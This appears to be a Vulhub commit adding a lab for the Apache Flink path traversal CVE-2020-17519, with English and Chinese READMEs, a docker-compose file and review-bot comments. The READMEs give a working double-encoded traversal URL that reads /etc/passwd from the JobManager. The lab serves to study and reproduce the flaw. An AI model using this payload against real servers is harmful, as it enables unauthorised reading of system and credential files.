first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
BIN
flink/CVE-2020-17519/1.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 48 KiB |
32
flink/CVE-2020-17519/README.md
Normal file
@@ -0,0 +1,32 @@
|
||||
# Apache Flink `jobmanager/logs` Path Traversal (CVE-2020-17519)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.
|
||||
|
||||
A vulnerability introduced in Apache Flink 1.11.0 (and present in versions 1.11.1 and 1.11.2) allows attackers to read arbitrary files from the local filesystem through the JobManager's REST interface. This path traversal vulnerability exists in the log viewing functionality.
|
||||
|
||||
References:
|
||||
|
||||
- <https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801>
|
||||
- <https://nvd.nist.gov/vuln/detail/CVE-2020-17519>
|
||||
|
||||
## Environment Setup
|
||||
|
||||
Execute the following command to start an Apache Flink jobmanager 1.11.2:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the Apache Flink service is started, visit `http://your-ip:8081` to access the management interface.
|
||||
|
||||
## Vulnerability Reproduction
|
||||
|
||||
Access the following URL to read the contents of `/etc/passwd` file from the target server:
|
||||
|
||||
```
|
||||
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
|
||||
```
|
||||
|
||||

|
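Review bot: The Vulnerability Reproduction section gives the traversal URL without explaining why it is written with `%252f`, and the description never names the release that fixes the issue. Add one sentence saying that `%252f` is a doubly URL-encoded `/` (`%25` decodes to `%`, leaving `%2f`), and state the fixed version next to the affected range 1.11.0 to 1.11.2 so readers know what to upgrade to. The two fenced blocks also carry no language tag; tagging the `docker compose up -d` block as shell would help rendering.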
30
flink/CVE-2020-17519/README.zh-cn.md
Normal file
@@ -0,0 +1,30 @@
|
||||
# Apache Flink `jobmanager/logs` 路径穿越漏洞(CVE-2020-17519)
|
||||
|
||||
Apache Flink 是一个开源的分布式流处理和批处理大数据计算引擎。
|
||||
|
||||
Apache Flink 1.11.0 版本中引入的一个更改(同时也存在于 1.11.1 和 1.11.2 版本中)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任意文件。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801>
|
||||
- <https://nvd.nist.gov/vuln/detail/CVE-2020-17519>
|
||||
|
||||
## 环境搭建
|
||||
|
||||
执行如下命令启动一个 Apache Flink jobmanager 1.11.2:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,访问 `http://your-ip:8081` 即可查看到 Apache Flink 的管理页面。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
通过以下 URL 可以读取服务器上的 `/etc/passwd` 文件内容:
|
||||
|
||||
```
|
||||
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
|
||||
```
|
||||
|
||||

|
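Review bot: The reproduction URL in this file does not match the one in README.md: this one has an extra `..%252f` segment before `etc%252fpasswd`. Use the same URL in both files so the translations stay in sync. README.md links to this file, but this file has no link back to README.md, and the sentence that places the flaw in the log viewing functionality is missing from this version; add both.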
7
flink/CVE-2020-17519/docker-compose.yml
Normal file
@@ -0,0 +1,7 @@
|
||||
services:
|
||||
flink:
|
||||
image: vulhub/flink:1.11.2
|
||||
command: jobmanager
|
||||
ports:
|
||||
- "8081:8081"
|
||||
- "6123:6123"
|
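Review bot: The `ports` entries publish both ports on every host interface, which exposes a deliberately vulnerable JobManager to whatever network the host is attached to. Bind them to loopback, for example `- "127.0.0.1:8081:8081"`, and drop `- "6123:6123"` unless something needs it, since the README steps only use port 8081.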